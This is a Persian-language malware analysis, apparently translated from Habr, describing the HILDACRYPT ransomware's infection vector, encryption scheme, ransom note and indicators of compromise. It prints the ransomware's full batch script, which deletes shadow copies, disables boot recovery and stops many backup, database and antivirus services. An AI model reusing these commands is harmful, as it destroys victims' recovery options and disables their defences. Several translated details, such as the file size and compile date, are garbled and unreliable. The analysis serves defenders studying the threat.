سلام، هابر! بار دیگر، ما در مورد آخرین نسخه های بدافزار از دسته Ransomware صحبت می کنیم. HILDACRYPT یک باج افزار جدید، یکی از اعضای خانواده هیلدا است که در آگوست 2019 کشف شد و نام آن برگرفته از کارتون Netflix است که برای توزیع نرم افزار استفاده می شد. امروز با ویژگی های فنی این ویروس باج افزار به روز شده آشنا می شویم.
در اولین نسخه باج افزار هیلدا، پیوندی به یکی از آنها در یوتیوب ارسال شده است
تجزیه و تحلیل استاتیک
این باج افزار در یک فایل PE32 .NET نوشته شده برای MS Windows موجود است. حجم آن 135 بایت است. هم کد برنامه اصلی و هم کد برنامه مدافع به زبان سی شارپ نوشته شده اند. با توجه به مهر تاریخ و زمان گردآوری، باینری در 168 سپتامبر 14 ایجاد شد.
به گفته Detect It Easy، باج افزار با استفاده از Confuser و ConfuserEx بایگانی می شود، اما این مبهم کننده ها مانند قبل هستند، تنها ConfuserEx جانشین Confuser است، بنابراین امضای کد آنها مشابه است.
HILDACRYPT در واقع با ConfuserEx بسته بندی شده است.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
بردار حمله
به احتمال زیاد، این باج افزار در یکی از سایت های برنامه نویسی وب کشف شده است که به عنوان یک برنامه قانونی XAMPP ظاهر شده است.
کل زنجیره عفونت در آن دیده می شود
مبهم سازی
رشته های باج افزار به صورت رمزگذاری شده ذخیره می شوند. هنگام راه اندازی، HILDACRYPT آنها را با استفاده از Base64 و AES-256-CBC رمزگشایی می کند.
نصب
اول از همه، باج افزار یک پوشه در %AppDataRoaming% ایجاد می کند که در آن پارامتر GUID (شناسه منحصر به فرد جهانی) به طور تصادفی تولید می شود. با افزودن یک فایل bat به این مکان، ویروس باج افزار آن را با استفاده از cmd.exe راه اندازی می کند:
cmd.exe /c JKfgkgj3hjgfhjka.bat و خارج شوید
سپس شروع به اجرای یک اسکریپت دسته ای برای غیرفعال کردن ویژگی ها یا خدمات سیستم می کند.
این اسکریپت حاوی لیست طولانی دستوراتی است که کپی های سایه را از بین می برد، سرور SQL را غیرفعال می کند، راه حل های پشتیبان و آنتی ویروس را غیرفعال می کند.
به عنوان مثال، بدون موفقیت تلاش می کند تا خدمات پشتیبان گیری Acronis را متوقف کند. علاوه بر این، به سیستم های پشتیبان و راه حل های آنتی ویروس از فروشندگان زیر حمله می کند: Veeam، Sophos، Kaspersky، McAfee و دیگران.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
هنگامی که سرویسها و فرآیندهای ذکر شده در بالا غیرفعال میشوند، cryptolocker اطلاعات مربوط به تمام فرآیندهای در حال اجرا را با استفاده از دستور tasklist جمعآوری میکند تا اطمینان حاصل کند که همه سرویسهای لازم خاموش هستند.
tasklist v/fo csv
این دستور فهرست دقیقی از فرآیندهای در حال اجرا را نمایش می دهد که عناصر آن با علامت "" از هم جدا شده اند.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
پس از این بررسی، باج افزار فرآیند رمزگذاری را آغاز می کند.
رمزگذاری
رمزگذاری فایل
HILDACRYPT تمام محتویات یافت شده در هارد دیسک ها را بررسی می کند، به جز پوشه های Recycle.Bin و Reference AssembliesMicrosoft. مورد دوم حاوی فایلهای حیاتی dll، pdb و غیره برای برنامههای Net است که میتواند بر عملکرد باجافزار تأثیر بگذارد. برای جستجوی فایل هایی که رمزگذاری خواهند شد، از لیست پسوندهای زیر استفاده می شود:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
این باج افزار از الگوریتم AES-256-CBC برای رمزگذاری فایل های کاربر استفاده می کند. اندازه کلید 256 بیت و اندازه بردار اولیه (IV) 16 بایت است.
در اسکرین شات زیر، مقادیر byte_2 و byte_1 به طور تصادفی با استفاده از GetBytes () بدست آمدند.
کلید
در و
فایل رمزگذاری شده دارای پسوند HCY است!.. این نمونه ای از یک فایل رمزگذاری شده است. کلید و IV ذکر شده در بالا برای این فایل ایجاد شده است.
رمزگذاری کلید
cryptolocker کلید AES تولید شده را در یک فایل رمزگذاری شده ذخیره می کند. قسمت اول فایل رمزگذاری شده دارای یک هدر است که حاوی داده هایی مانند HILDACRYPT، KEY، IV، FileLen با فرمت XML است و به شکل زیر است:
رمزگذاری کلیدهای AES و IV با استفاده از RSA-2048 و رمزگذاری با استفاده از Base64 انجام می شود. کلید عمومی RSA در بدنه cryptolocker در یکی از رشته های رمزگذاری شده در قالب XML ذخیره می شود.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
یک کلید عمومی RSA برای رمزگذاری کلید فایل AES استفاده می شود. کلید عمومی RSA با Base64 کدگذاری شده است و از یک مدول و یک توان عمومی 65537 تشکیل شده است. رمزگشایی به کلید خصوصی RSA نیاز دارد که مهاجم دارای آن است.
پس از رمزگذاری RSA، کلید AES با استفاده از Base64 ذخیره شده در فایل رمزگذاری شده رمزگذاری می شود.
پیام باج
پس از تکمیل رمزگذاری، HILDACRYPT فایل html را در پوشه ای که فایل ها را در آن رمزگذاری کرده است، می نویسد. اعلان باج افزار حاوی دو آدرس ایمیل است که قربانی می تواند با مهاجم تماس بگیرد.
اخطار اخاذی همچنین حاوی خط "No loli ایمن نیست؛)" است - اشاره ای به شخصیت های انیمه و مانگا با ظاهر دختر بچه های ممنوعه در ژاپن.
نتیجه
HILDACRYPT، یک خانواده جدید باج افزار، نسخه جدیدی را منتشر کرده است. مدل رمزگذاری، قربانی را از رمزگشایی فایل های رمزگذاری شده توسط باج افزار جلوگیری می کند. Cryptolocker از روش های حفاظت فعال برای غیرفعال کردن خدمات حفاظتی مربوط به سیستم های پشتیبان و راه حل های آنتی ویروس استفاده می کند. نویسنده HILDACRYPT یکی از طرفداران سریال انیمیشن هیلدا است که در نتفلیکس نشان داده شده است که لینک تریلر آن در نامه خرید نسخه قبلی برنامه موجود بود.
مثل همیشه،
شاخص های سازش
پسوند فایل HCY!
HILDACRYPTReadMe.html
xamp.exe با یک حرف "p" و بدون امضای دیجیتال
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
منبع: www.habr.com